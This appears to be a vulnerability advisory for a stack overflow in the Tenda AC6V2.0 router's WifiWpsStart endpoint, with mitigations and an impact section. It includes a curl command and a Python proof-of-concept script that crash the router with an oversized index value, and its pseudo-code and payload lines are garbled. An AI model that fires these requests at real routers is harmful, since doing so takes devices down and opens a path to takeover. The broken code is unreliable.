Listen to this Post
The vulnerability is a stack overflow in the Tenda AC6V2.0 router’s `WifiWpsStart` function, specifically within the `/goform/WifiWpsStart` endpoint of firmware version V15.03.06.23_multi . The issue arises because the `index` and `mode` parameters, which are supplied by the user during an HTTP POST request, are directly controllable by an attacker. The vulnerable code uses the `sprintf` function to concatenate these user-supplied values into a fixed-size buffer named `tmp` on the stack without performing any checks to ensure the total length of the resulting string is within the buffer’s capacity. An attacker can exploit this by sending a crafted request with overly long values for `index` and mode. When `sprintf` writes this oversized data into the `tmp` buffer, it exceeds the allocated memory boundary, overwriting adjacent memory regions on the stack. This corruption can lead to a denial of service by crashing the device, or potentially allow for arbitrary code execution with the device’s privileges .
Platform: Tenda AC6V2.0
Version: V15.03.06.23_multi
Vulnerability: Stack overflow
Severity: High
Date: 2026-03-02
Prediction: Patch unlikely
What Undercode Say:
Analytics:
The vulnerability can be tested by sending a crafted POST request to the router’s web interface.
Example curl command to test for overflow (may crash the device)
curl -X POST http://<router_ip>/goform/WifiWpsStart \
-d "index=$(python3 -c 'print("A" 500)')&mode=1"
Analysis of the vulnerable function in pseudo-code:
// Vulnerable snippet within /goform/WifiWpsStart char tmp[bash]; // Small stack buffer char index[bash]; // User input char mode[bash]; // User input // ... http parsing ... // No length check on index and mode before splicing sprintf(tmp, "index=%s&mode=%s", index, mode); // Stack overflow // ... further processing ...
Exploit:
A proof-of-concept exploit involves sending an oversized `index` parameter to overflow the stack and potentially hijack the program flow .
Simple Proof-of-Concept Script
import requests
url = "http://192.168.0.1/goform/WifiWpsStart"
A long string of "A"s to overflow the buffer
payload = 'A' 500
data = {'index': payload, 'mode': '1'}
try:
response = requests.post(url, data=data, timeout=3)
print("Request sent. Check if router crashed.")
except requests.exceptions.Timeout:
print("Router likely crashed (Timeout).")
except Exception as e:
print(f"An error occurred: {e}")
Protection from this CVE:
- Apply input validation and bounds checking in the firmware before using `sprintf` .
- Use safer functions like `snprintf` to limit the number of bytes written to the buffer.
- Disable the WPS functionality on the router’s administration interface if not required.
- Monitor for and install any official firmware updates from Tenda if they become available, though currently no solution exists .
Impact:
Successful exploitation allows a remote, unauthenticated attacker to cause a denial of service (device crash). In more severe cases, it could lead to arbitrary code execution, granting the attacker full control over the router, which could be used to monitor network traffic, launch further attacks, or add the device to a botnet .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

